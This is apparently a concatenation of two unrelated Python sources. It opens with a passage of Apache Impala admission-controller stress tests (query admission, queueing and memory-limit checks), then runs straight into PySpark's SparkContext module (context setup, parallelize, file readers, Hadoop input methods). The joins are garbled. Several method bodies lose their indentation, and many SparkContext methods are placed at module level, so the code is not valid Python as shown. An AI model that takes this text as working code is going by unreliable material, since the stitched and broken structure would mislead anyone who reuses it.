    assert metric_deltas['admitted'] >= MAX_NUM_CONCURRENT_QUERIES,\
        "Admitted fewer than expected queries"
    assert metric_deltas['admitted'] <= MAX_NUM_CONCURRENT_QUERIES * len(self.impalads),\
        "Admitted more than expected queries: at least one daemon over-admitted"
    assert metric_deltas['queued'] >=\
        min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES),\
        "Should have queued more queries before rejecting them"
    assert metric_deltas['queued'] <= MAX_NUM_QUEUED_QUERIES * len(self.impalads),\
        "Queued too many queries: at least one daemon queued too many"
    assert metric_deltas['rejected'] + metric_deltas['admitted'] +\
        metric_deltas['queued'] == num_queries,\
        "Initial admission decisions don't add up to {0}: {1}".format(
            num_queries, str(metric_deltas))
    initial_metric_deltas = metric_deltas
    # Like above, check that the count from the queries webpage json is reasonable.
    min_queued = min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES)
    max_queued = MAX_NUM_QUEUED_QUERIES * len(self.impalads)
    self.wait_on_queries_page_num_queued(min_queued, max_queued)
    self._check_queries_page_resource_pools()
    # Admit queries in waves until all queries are done. A new wave of admission
    # is started by killing some of the running queries.
    while len(self.executing_threads) > 0:
      curr_metrics = self.get_consistent_admission_metrics(num_queries)
      log_metrics("Main loop, curr_metrics: ", curr_metrics)
      num_to_end = len(self.executing_threads)
      LOG.info("Main loop, will request %s queries to end", num_to_end)
      self.end_admitted_queries(num_to_end)
      self.wait_for_metric_changes(['released'], curr_metrics, num_to_end)
      # Ending queries frees capacity; some of the still-queued queries should
      # now be admitted.
      num_queued_remaining =\
          curr_metrics['queued'] - curr_metrics['dequeued'] - curr_metrics['timed-out']
      expected_admitted = min(num_queued_remaining, MAX_NUM_CONCURRENT_QUERIES)
      (metric_deltas, _) = self.wait_for_metric_changes(
          ['admitted', 'timed-out'], curr_metrics, expected_admitted)
      # The queue timeout is set high for these tests, so we don't expect any queries to
      # time out.
      assert metric_deltas['admitted'] >= expected_admitted
      assert metric_deltas['timed-out'] == 0
      self.wait_for_admitted_threads(metric_deltas['admitted'])
      # Wait a few topic updates to ensure the admission controllers have reached a steady
      # state or we may find an impalad dequeue more requests after we capture metrics.
      self.wait_for_statestore_updates(10)
    final_metrics = self.get_consistent_admission_metrics(num_queries)
    log_metrics("Final metrics: ", final_metrics)
    metric_deltas = compute_metric_deltas(final_metrics, initial_metrics)
    assert metric_deltas['timed-out'] == 0
    if round_robin_submission:
      min_expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
      assert metric_deltas['admitted'] >= min_expected_admitted
      assert metric_deltas['admitted'] <= min_expected_admitted * len(self.impalads)
      assert metric_deltas['admitted'] ==\
          initial_metric_deltas['admitted'] + initial_metric_deltas['queued']
      assert metric_deltas['queued'] == initial_metric_deltas['queued']
      assert metric_deltas['rejected'] == initial_metric_deltas['rejected']
    else:
      # We shouldn't go over the max number of queries or queue size so we can compute
      # the expected number of queries that should have been admitted (which includes the
      # number queued as they eventually get admitted as well), queued, and rejected
      expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
      assert metric_deltas['admitted'] == expected_admitted
      assert metric_deltas['queued'] == MAX_NUM_QUEUED_QUERIES
      assert metric_deltas['rejected'] == num_queries - expected_admitted
    # All queries should be completed by now.
    self.wait_on_queries_page_num_queued(0, 0)
    self._check_queries_page_resource_pools()
    # Surface the first error any submission thread hit.
    for thread in self.all_threads:
      if thread.error is not None:
        raise thread.error
  @pytest.mark.execute_serially
  @SkipIfOS.redhat6
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=MAX_NUM_CONCURRENT_QUERIES,
          max_queued=MAX_NUM_QUEUED_QUERIES, pool_max_mem=-1, queue_wait_timeout_ms=600000),
      statestored_args=_STATESTORED_ARGS)
  def test_admission_controller_with_flags(self, vector):
    """Stress test against a cluster whose admission limits come from startup flags
    (default pool, request/queue limits only, no pool memory limit)."""
    if self.exploration_strategy() != 'exhaustive':
      pytest.skip('runs only in exhaustive')
    self.pool_name = 'default-pool'
    # The pool has no mem resources set, so submitting queries with huge mem_limits
    # should be fine. This exercises the code that does the per-pool memory
    # accounting (see MemTracker::GetPoolMemReserved()) without actually being throttled.
    self.run_admission_test(vector, {'request_pool': self.pool_name,
        'mem_limit': sys.maxint})
  @pytest.mark.execute_serially
  @SkipIfOS.redhat6
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_config_args(
          fs_allocation_file="fair-scheduler-test2.xml",
          llama_site_file="llama-site-test2.xml"),
      statestored_args=_STATESTORED_ARGS)
  def test_admission_controller_with_configs(self, vector):
    """Stress test against a cluster whose admission limits come from fair-scheduler
    and llama-site configuration files (pool 'root.queueB')."""
    self.pool_name = 'root.queueB'
    self.run_admission_test(vector, {'request_pool': self.pool_name})
def get_proc_limit(self):
"""Gets the process mem limit as reported by the impalad's mem-tracker metric.
Raises an assertion if not all impalads have the same value."""
limit_metrics = []
for impalad in self.cluster.impalads:
limit_metrics.append(impalad.service.get_metric_value("mem-tracker.process.limit"))
assert limit_metrics[0] == limit_metrics[-1],\
"Not all impalads have the same process limit: %s" % (limit_metrics,)
assert limit_metrics[0] is not None
return limit_metrics[0]
  @pytest.mark.execute_serially
  @SkipIfOS.redhat6
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(
          max_requests=MAX_NUM_CONCURRENT_QUERIES * 30, max_queued=MAX_NUM_QUEUED_QUERIES,
          pool_max_mem=MEM_TEST_LIMIT, proc_mem_limit=MEM_TEST_LIMIT,
          queue_wait_timeout_ms=600000),
      statestored_args=_STATESTORED_ARGS)
  def test_mem_limit(self, vector):
    """Stress test where queries are queued/rejected due to pool memory limits
    rather than the (deliberately huge) concurrent-request limit."""
    # Impala may set the proc mem limit lower than we think depending on the overcommit
    # settings of the OS. It should be fine to continue anyway.
    proc_limit = self.get_proc_limit()
    if proc_limit != MEM_TEST_LIMIT:
      LOG.info("Warning: Process mem limit %s is not expected val %s", proc_limit,
          MEM_TEST_LIMIT)
    self.pool_name = 'default-pool'
    # Each query mem limit (set the query option to override the per-host memory
    # estimate) should use a bit less than (total pool mem limit) / #queries so that
    # once #queries are running, the total pool mem usage is about at the limit and
    # additional incoming requests will be rejected. The actual pool limit on the number
    # of running requests is very high so that requests are only queued/rejected due to
    # the mem limit.
    num_impalads = len(self.cluster.impalads)
    query_mem_limit = (proc_limit / MAX_NUM_CONCURRENT_QUERIES / num_impalads) - 1
    self.run_admission_test(vector,
        {'request_pool': self.pool_name, 'mem_limit': query_mem_limit})
class TestAdmissionControllerStressWithACService(TestAdmissionControllerStress):
  """Runs all of the tests from TestAdmissionControllerStress but with the second impalad
  in the minicluster configured to perform all admission control."""

  def get_ac_processes(self):
    # All admission decisions are made by the dedicated admissiond process.
    return [self.cluster.admissiond]

  def get_ac_log_name(self):
    return "admissiond"

  def setup_method(self, method):
    if self.exploration_strategy() != 'exhaustive':
      pytest.skip('runs only in exhaustive')
    # Rewrite the test's custom-cluster args (stored by the with_args decorator on
    # the function's func_dict) so the cluster starts with the admission service
    # enabled and the admissiond receives the same flags as the impalads.
    if 'start_args' not in method.func_dict:
      method.func_dict['start_args'] = list()
    method.func_dict["start_args"].append("--enable_admission_service")
    if "impalad_args" in method.func_dict:
      method.func_dict["admissiond_args"] = method.func_dict["impalad_args"]
    # NOTE(review): super() is given TestAdmissionControllerStress (not this class),
    # which skips the parent's own setup_method override — presumably deliberate,
    # but worth confirming.
    super(TestAdmissionControllerStress, self).setup_method(method)
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
# Python 3 removed xrange; alias it so the rest of this module can use xrange
# uniformly on both major versions.
if sys.version > '3':
    xrange = range

__all__ = ['SparkContext']

# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
    "spark.serializer.objectStreamReset": 100,
    "spark.rdd.compress": True,
}
class SparkContext(object):
    """
    Main entry point for Spark functionality. A SparkContext represents the
    connection to a Spark cluster, and can be used to create L{RDD} and
    broadcast variables on that cluster.
    """

    # Process-wide state shared by all SparkContext instances; guarded by _lock.
    _gateway = None  # the Py4J gateway to the JVM, launched once per process
    _jvm = None  # JVM view obtained from the gateway
    _next_accum_id = 0
    _active_spark_context = None  # singleton: at most one active context per process
    _lock = RLock()
    _python_includes = None  # zip and egg files that need to be added to PYTHONPATH

    PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
    def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
                 environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
                 gateway=None, jsc=None, profiler_cls=BasicProfiler):
        """
        Create a new SparkContext. At least the master and app name should be set,
        either through the named parameters here or through C{conf}.

        :param master: Cluster URL to connect to
               (e.g. mesos://host:port, spark://host:port, local[4]).
        :param appName: A name for your job, to display on the cluster web UI.
        :param sparkHome: Location where Spark is installed on cluster nodes.
        :param pyFiles: Collection of .zip or .py files to send to the cluster
               and add to PYTHONPATH.  These can be paths on the local file
               system or HDFS, HTTP, HTTPS, or FTP URLs.
        :param environment: A dictionary of environment variables to set on
               worker nodes.
        :param batchSize: The number of Python objects represented as a single
               Java object. Set 1 to disable batching, 0 to automatically choose
               the batch size based on object sizes, or -1 to use an unlimited
               batch size
        :param serializer: The serializer for RDDs.
        :param conf: A L{SparkConf} object setting Spark properties.
        :param gateway: Use an existing gateway and JVM, otherwise a new JVM
               will be instantiated.
        :param jsc: The JavaSparkContext instance (optional).
        :param profiler_cls: A class of custom Profiler used to do profiling
               (default is pyspark.profiler.BasicProfiler).


        >>> from pyspark.context import SparkContext
        >>> sc = SparkContext('local', 'test')

        >>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
            ...
        ValueError:...
        """
        # Record where user code created this context, for the duplicate-context error.
        self._callsite = first_spark_call() or CallSite(None, None, None)
        # Launch the Py4J gateway / JVM (or reuse an existing one) before init proper.
        SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
        try:
            self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
                          conf, jsc, profiler_cls)
        except:
            # If an error occurs, clean up in order to allow future SparkContext creation:
            self.stop()
            raise
    def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
                 conf, jsc, profiler_cls):
        """Perform the bulk of SparkContext initialization: build the effective
        SparkConf, create the Java SparkContext, start the accumulator server,
        register Python dependencies, and install profiling/signal hooks.
        Called from __init__ after the JVM gateway is up."""
        self.environment = environment or {}
        # java gateway must have been launched at this point.
        if conf is not None and conf._jconf is not None:
            # conf has been initialized in JVM properly, so use conf directly. This represent the
            # scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
            # created and then stopped, and we create a new SparkConf and new SparkContext again)
            self._conf = conf
        else:
            self._conf = SparkConf(_jvm=SparkContext._jvm)
            if conf is not None:
                for k, v in conf.getAll():
                    self._conf.set(k, v)

        self._batchSize = batchSize  # -1 represents an unlimited batch size
        self._unbatched_serializer = serializer
        if batchSize == 0:
            self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
        else:
            self.serializer = BatchedSerializer(self._unbatched_serializer,
                                                batchSize)

        # Set any parameters passed directly to us on the conf
        if master:
            self._conf.setMaster(master)
        if appName:
            self._conf.setAppName(appName)
        if sparkHome:
            self._conf.setSparkHome(sparkHome)
        if environment:
            for key, value in environment.items():
                self._conf.setExecutorEnv(key, value)
        for key, value in DEFAULT_CONFIGS.items():
            self._conf.setIfMissing(key, value)

        # Check that we have at least the required parameters
        if not self._conf.contains("spark.master"):
            raise Exception("A master URL must be set in your configuration")
        if not self._conf.contains("spark.app.name"):
            raise Exception("An application name must be set in your configuration")

        # Read back our properties from the conf in case we loaded some of them from
        # the classpath or an external config file
        self.master = self._conf.get("spark.master")
        self.appName = self._conf.get("spark.app.name")
        self.sparkHome = self._conf.get("spark.home", None)

        for (k, v) in self._conf.getAll():
            if k.startswith("spark.executorEnv."):
                varName = k[len("spark.executorEnv."):]
                self.environment[varName] = v

        # Default hash seed so Python workers hash consistently across the cluster.
        self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")

        # Create the Java SparkContext through Py4J
        self._jsc = jsc or self._initialize_context(self._conf._jconf)
        # Reset the SparkConf to the one actually used by the SparkContext in JVM.
        self._conf = SparkConf(_jconf=self._jsc.sc().conf())

        # Create a single Accumulator in Java that we'll send all our updates through;
        # they will be passed back to us through a TCP server
        self._accumulatorServer = accumulators._start_update_server()
        (host, port) = self._accumulatorServer.server_address
        self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port)
        self._jsc.sc().register(self._javaAccumulator)

        self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
        self.pythonVer = "%d.%d" % sys.version_info[:2]

        # Broadcast's __reduce__ method stores Broadcast instances here.
        # This allows other code to determine which Broadcast instances have
        # been pickled, so it can determine which Java broadcast objects to
        # send.
        self._pickled_broadcast_vars = BroadcastPickleRegistry()

        SparkFiles._sc = self
        root_dir = SparkFiles.getRootDirectory()
        sys.path.insert(1, root_dir)

        # Deploy any code dependencies specified in the constructor
        self._python_includes = list()
        for path in (pyFiles or []):
            self.addPyFile(path)

        # Deploy code dependencies set by spark-submit; these will already have been added
        # with SparkContext.addFile, so we just need to add them to the PYTHONPATH
        for path in self._conf.get("spark.submit.pyFiles", "").split(","):
            if path != "":
                (dirname, filename) = os.path.split(path)
                if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
                    self._python_includes.append(filename)
                    sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))

        # Create a temporary directory inside spark.local.dir:
        local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
        self._temp_dir = \
            self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
                .getAbsolutePath()

        # profiling stats collected for each PythonRDD
        if self._conf.get("spark.python.profile", "false") == "true":
            dump_path = self._conf.get("spark.python.profile.dump", None)
            self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
        else:
            self.profiler_collector = None

        # create a signal handler which would be invoked on receiving SIGINT
        def signal_handler(signal, frame):
            self.cancelAllJobs()
            raise KeyboardInterrupt()

        # see http://stackoverflow.com/questions/23206787/
        if isinstance(threading.current_thread(), threading._MainThread):
            signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
    def _repr_html_(self):
        """Rich HTML representation rendered by Jupyter/IPython notebooks:
        a small card with a link to the Spark UI, the version, master and app name."""
        return """
        <div>
            <p><b>SparkContext</b></p>

            <p><a href="{sc.uiWebUrl}">Spark UI</a></p>

            <dl>
              <dt>Version</dt>
                <dd><code>v{sc.version}</code></dd>
              <dt>Master</dt>
                <dd><code>{sc.master}</code></dd>
              <dt>AppName</dt>
                <dd><code>{sc.appName}</code></dd>
            </dl>
        </div>
        """.format(
            sc=self
        )
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
    @classmethod
    def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
        """
        Checks whether a SparkContext is initialized or not.
        Throws error if a SparkContext is already running.
        """
        with SparkContext._lock:
            # Launch the JVM gateway lazily, once per process.
            if not SparkContext._gateway:
                SparkContext._gateway = gateway or launch_gateway(conf)
                SparkContext._jvm = SparkContext._gateway.jvm

            if instance:
                # Enforce the one-active-context-per-process invariant.
                if (SparkContext._active_spark_context and
                        SparkContext._active_spark_context != instance):
                    currentMaster = SparkContext._active_spark_context.master
                    currentAppName = SparkContext._active_spark_context.appName
                    callsite = SparkContext._active_spark_context._callsite

                    # Raise error if there is already a running Spark context
                    raise ValueError(
                        "Cannot run multiple SparkContexts at once; "
                        "existing SparkContext(app=%s, master=%s)"
                        " created by %s at %s:%s "
                        % (currentAppName, currentMaster,
                            callsite.function, callsite.file, callsite.linenum))
                else:
                    SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
    @classmethod
    def getOrCreate(cls, conf=None):
        """
        Get or instantiate a SparkContext and register it as a singleton object.

        :param conf: SparkConf (optional)
        """
        with SparkContext._lock:
            # Creating the context registers it as _active_spark_context, so the
            # subsequent read returns either the existing or the new singleton.
            if SparkContext._active_spark_context is None:
                SparkContext(conf=conf or SparkConf())
            return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
    @classmethod
    def setSystemProperty(cls, key, value):
        """
        Set a Java system property, such as spark.executor.memory. This must
        must be invoked before instantiating SparkContext.
        """
        # Only the gateway/JVM is required here, not a full context.
        SparkContext._ensure_initialized()
        SparkContext._jvm.java.lang.System.setProperty(key, value)
    @property
    def version(self):
        """
        The version of Spark on which this application is running.
        """
        # Delegates to the JVM-side JavaSparkContext.
        return self._jsc.version()
    @property
    @ignore_unicode_prefix
    def applicationId(self):
        """
        A unique identifier for the Spark application.
        Its format depends on the scheduler implementation.

        * in case of local spark app something like 'local-1433865536131'
        * in case of YARN something like 'application_1433865536131_34483'

        >>> sc.applicationId  # doctest: +ELLIPSIS
        u'local-...'
        """
        return self._jsc.sc().applicationId()
    @property
    def uiWebUrl(self):
        """Return the URL of the SparkUI instance started by this SparkContext"""
        # The JVM side returns an Option; .get() assumes the UI was started.
        return self._jsc.sc().uiWebUrl().get()
    @property
    def startTime(self):
        """Return the epoch time when the Spark Context was started."""
        return self._jsc.startTime()
    @property
    def defaultParallelism(self):
        """
        Default level of parallelism to use when not given by user (e.g. for
        reduce tasks)
        """
        return self._jsc.sc().defaultParallelism()
    @property
    def defaultMinPartitions(self):
        """
        Default min number of partitions for Hadoop RDDs when not given by user
        """
        return self._jsc.sc().defaultMinPartitions()
    def stop(self):
        """
        Shut down the SparkContext.

        Safe to call multiple times and on a partially-initialized context
        (getattr guards handle attributes that were never set).
        """
        if getattr(self, "_jsc", None):
            try:
                self._jsc.stop()
            except Py4JError:
                # Case: SPARK-18523
                warnings.warn(
                    'Unable to cleanly shutdown Spark JVM process.'
                    ' It is possible that the process has crashed,'
                    ' been killed or may also be in a zombie state.',
                    RuntimeWarning
                )
                pass
            finally:
                self._jsc = None
        if getattr(self, "_accumulatorServer", None):
            self._accumulatorServer.shutdown()
            self._accumulatorServer = None
        # Clear the process-wide singleton so a new context can be created.
        with SparkContext._lock:
            SparkContext._active_spark_context = None
    def emptyRDD(self):
        """
        Create an RDD that has no partitions or elements.
        """
        # NoOpSerializer: there is nothing to (de)serialize in an empty RDD.
        return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
    """
    Create a new RDD of int containing elements from `start` to `end`
    (exclusive), increased by `step` every element, mirroring Python's
    built-in range(). With a single argument, that argument is taken as
    `end` and `start` defaults to 0.

    :param start: the start value
    :param end: the end value (exclusive)
    :param step: the incremental step (default: 1)
    :param numSlices: the number of partitions of the new RDD
    :return: An RDD of int

    >>> sc.range(5).collect()
    [0, 1, 2, 3, 4]
    >>> sc.range(2, 4).collect()
    [2, 3]
    >>> sc.range(1, 7, 2).collect()
    [1, 3, 5]
    """
    # Single-argument form: range(end).
    if end is None:
        start, end = 0, start
    return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
    """
    Distribute a local Python collection to form an RDD. Using xrange
    is recommended if the input represents a range for performance.

    >>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
    [[0], [2], [3], [4], [6]]
    >>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
    [[], [0], [], [2], [4]]
    """
    numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
    if isinstance(c, xrange):
        # Fast path: a range is fully described by (start, step, size), so
        # each partition regenerates its slice locally instead of shipping
        # the materialized numbers through serialization.
        size = len(c)
        if size == 0:
            return self.parallelize([], numSlices)
        step = c[1] - c[0] if size > 1 else 1
        start0 = c[0]

        def getStart(split):
            # First element of partition `split` when the range is divided
            # as evenly as integer arithmetic allows.
            return start0 + int((split * size / numSlices)) * step

        def f(split, iterator):
            return xrange(getStart(split), getStart(split + 1), step)

        return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
    # Calling the Java parallelize() method with an ArrayList is too slow,
    # because it sends O(n) Py4J commands. As an alternative, serialized
    # objects are written to a file and loaded through textFile().
    tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
    try:
        # Make sure we distribute data evenly if it's smaller than self.batchSize
        if "__len__" not in dir(c):
            c = list(c)    # Make it a list so we can compute its length
        batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
        serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
        serializer.dump_stream(c, tempFile)
        tempFile.close()
        readRDDFromFile = self._jvm.PythonRDD.readRDDFromFile
        jrdd = readRDDFromFile(self._jsc, tempFile.name, numSlices)
    finally:
        # readRDDFromFile eagerly reads the file, so it is safe to delete
        # it immediately (even if the read above raised).
        os.unlink(tempFile.name)
    return RDD(jrdd, self, serializer)
def pickleFile(self, name, minPartitions=None):
    """
    Load an RDD previously saved using L{RDD.saveAsPickleFile} method.

    >>> tmpFile = NamedTemporaryFile(delete=True)
    >>> tmpFile.close()
    >>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
    >>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
    [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
    """
    partitions = minPartitions or self.defaultMinPartitions
    return RDD(self._jsc.objectFile(name, partitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
    """
    Read a text file from HDFS, a local file system (available on all
    nodes), or any Hadoop-supported file system URI, and return it as an
    RDD of Strings.

    If use_unicode is False, the strings will be kept as `str` (encoding
    as `utf-8`), which is faster and smaller than unicode. (Added in
    Spark 1.2)

    >>> path = os.path.join(tempdir, "sample-text.txt")
    >>> with open(path, "w") as testFile:
    ...    _ = testFile.write("Hello world!")
    >>> textFile = sc.textFile(path)
    >>> textFile.collect()
    [u'Hello world!']
    """
    partitions = minPartitions or min(self.defaultParallelism, 2)
    lines = self._jsc.textFile(name, partitions)
    return RDD(lines, self, UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
    """
    Read a directory of text files from HDFS, a local file system
    (available on all nodes), or any Hadoop-supported file system
    URI. Each file is read as a single record and returned in a
    key-value pair, where the key is the path of each file, the
    value is the content of each file.

    If use_unicode is False, the strings will be kept as `str` (encoding
    as `utf-8`), which is faster and smaller than unicode. (Added in
    Spark 1.2)

    For example, if you have the following files::

      hdfs://a-hdfs-path/part-00000
      hdfs://a-hdfs-path/part-00001
      ...
      hdfs://a-hdfs-path/part-nnnnn

    Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
    then C{rdd} contains::

      (a-hdfs-path/part-00000, its content)
      (a-hdfs-path/part-00001, its content)
      ...
      (a-hdfs-path/part-nnnnn, its content)

    .. note:: Small files are preferred, as each file will be loaded
        fully in memory.

    :param path: directory to read
    :param minPartitions: minimum number of partitions
           (default: C{sc.defaultMinPartitions})
    :param use_unicode: when True, decode each file's content as unicode

    >>> dirPath = os.path.join(tempdir, "files")
    >>> os.mkdir(dirPath)
    >>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
    ...    _ = file1.write("1")
    >>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
    ...    _ = file2.write("2")
    >>> textFiles = sc.wholeTextFiles(dirPath)
    >>> sorted(textFiles.collect())
    [(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
    """
    minPartitions = minPartitions or self.defaultMinPartitions
    # Both the key (path) and value (content) come back UTF-8 encoded.
    return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
               PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
    """
    .. note:: Experimental

    Read a directory of binary files from HDFS, a local file system
    (available on all nodes), or any Hadoop-supported file system URI
    as a byte array. Each file is read as a single record and returned
    as a (path, content) key-value pair.

    .. note:: Small files are preferred, large file is also allowable, but
        may cause bad performance.
    """
    partitions = minPartitions or self.defaultMinPartitions
    pairs = self._jsc.binaryFiles(path, partitions)
    return RDD(pairs, self,
               PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
    """
    .. note:: Experimental

    Load data from a flat binary file in which every record occupies a
    fixed number of bytes (see ByteBuffer for the numerical format).

    :param path: Directory to the input data files
    :param recordLength: The length at which to split the records
    """
    records = self._jsc.binaryRecords(path, recordLength)
    return RDD(records, self, NoOpSerializer())
def _dictToJavaMap(self, d):
    """Copy a Python dict (or None, treated as empty) into a java.util.HashMap."""
    jm = self._jvm.java.util.HashMap()
    for key, val in (d or {}).items():
        jm[key] = val
    return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
                 valueConverter=None, minSplits=None, batchSize=0):
    """
    Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
    a local file system (available on all nodes), or any Hadoop-supported file
    system URI. The mechanism is as follows:

        1. A Java RDD is created from the SequenceFile or other InputFormat,
           and the key and value Writable classes
        2. Serialization is attempted via Pyrolite pickling
        3. If this fails, the fallback is to call 'toString' on each key and value
        4. C{PickleSerializer} is used to deserialize pickled objects on the Python side

    :param path: path to sequencefile
    :param keyClass: fully qualified classname of key Writable class
           (e.g. "org.apache.hadoop.io.Text")
    :param valueClass: fully qualified classname of value Writable class
           (e.g. "org.apache.hadoop.io.LongWritable")
    :param keyConverter:
    :param valueConverter:
    :param minSplits: minimum splits in dataset
           (default min(2, sc.defaultParallelism))
    :param batchSize: The number of Python objects represented as a single
           Java object. (default 0, choose batchSize automatically)
    """
    splits = minSplits or min(self.defaultParallelism, 2)
    java_rdd = self._jvm.PythonRDD.sequenceFile(
        self._jsc, path, keyClass, valueClass,
        keyConverter, valueConverter, splits, batchSize)
    return RDD(java_rdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
                     valueConverter=None, conf=None, batchSize=0):
    """
    Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
    a local file system (available on all nodes), or any Hadoop-supported file
    system URI. The mechanism is the same as for sc.sequenceFile. A Hadoop
    configuration can be passed in as a Python dict; it is translated into a
    Configuration in Java.

    :param path: path to Hadoop file
    :param inputFormatClass: fully qualified classname of Hadoop InputFormat
           (e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
    :param keyClass: fully qualified classname of key Writable class
           (e.g. "org.apache.hadoop.io.Text")
    :param valueClass: fully qualified classname of value Writable class
           (e.g. "org.apache.hadoop.io.LongWritable")
    :param keyConverter: (None by default)
    :param valueConverter: (None by default)
    :param conf: Hadoop configuration, passed in as a dict (None by default)
    :param batchSize: The number of Python objects represented as a single
           Java object. (default 0, choose batchSize automatically)
    """
    java_conf = self._dictToJavaMap(conf)
    java_rdd = self._jvm.PythonRDD.newAPIHadoopFile(
        self._jsc, path, inputFormatClass, keyClass, valueClass,
        keyConverter, valueConverter, java_conf, batchSize)
    return RDD(java_rdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
                    valueConverter=None, conf=None, batchSize=0):
    """
    Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an
    arbitrary Hadoop configuration, which is passed in as a Python dict and
    translated into a Configuration in Java. The mechanism is the same as for
    sc.sequenceFile.

    :param inputFormatClass: fully qualified classname of Hadoop InputFormat
           (e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
    :param keyClass: fully qualified classname of key Writable class
           (e.g. "org.apache.hadoop.io.Text")
    :param valueClass: fully qualified classname of value Writable class
           (e.g. "org.apache.hadoop.io.LongWritable")
